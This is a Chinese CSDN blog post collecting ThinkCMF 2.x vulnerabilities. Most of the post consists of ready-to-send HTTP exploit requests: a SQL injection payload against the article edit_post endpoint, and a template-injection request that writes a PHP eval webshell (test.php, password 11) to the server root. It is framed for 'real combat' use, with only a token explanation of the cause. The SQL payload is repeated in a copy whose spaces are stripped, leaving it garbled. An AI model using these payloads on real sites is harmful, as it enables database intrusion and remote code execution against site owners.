thinkcmfx漏洞太大_ThinkCMF 2.x漏洞合集

本文详细介绍了ThinkCMF 2系列的多个安全漏洞,包括前台用户文章编辑的SQL注入、模板注入导致的getshell、API类模板注入以及任意文件删除漏洞,提供了漏洞利用的方法和原理。
摘要由CSDN通过智能技术生成

本文说的是ThinkCMF 2系列,包含ThinkCMF 2.2.3漏洞,其它ThinkCMF 1.6.0从SQL注入到任意代码执行

前台用户文章编辑提交存在注入

前台的文章编辑中操作框架注入,所以可以直接sql注入

url:http://thinkcmf.test/index.php?g=Portal&m=Article&a=edit_post

post:

term:123

post[post_title]:123

post[post_title]:aaa

post_title:123

post[id][0]:bind

post[id][1]:0 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))

1

2

3

4

5

6

7

8url:http://thinkcmf.test/index.php?g=Portal&m=Article&a=edit_post

post:

term:123

post[post_title]:123

post[post_title]:aaa

post_title:123

post[id][0]:bind

post[id][1]:0and(updatexml(1,concat(0x7e,(selectuser()),0x7e),1))

漏洞原理

文件:ThinkCMFX_2.2.3\application\Portal\Controller\ArticleController.class.php

方法:public function edit_post(

这里不多讲,因为没得意义。详情请看先知的历史tp漏洞,谢谢:)

前台模版注入漏洞-可getshell两处

Comment类模版引擎注入演示

url:http://thinkcmf.test/index.php?g=Comment&m=Widget&a=fetch

post:

templateFile=/../public/index

prefix=''

content=file_put_contents('test.php','<?php eval($_REQUEST[11]);')

1

2

3

4

5url:http://thinkcmf.test/index.php?g=Comment&m=Widget&a=fetch

post:

templateFile=/../public/index

prefix=''

content=file_put_contents('test.php','<?php eval($_REQUEST[11]);')

发送之后页面http状态会为200,这样就表示成功了

简单讲解一下:content 我输入了php代码所以他会在本地跟路径创建一个一句话木马test.php

所以实战过程中。

连接马子:http://xxxxx.com/test.php 密码:11

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值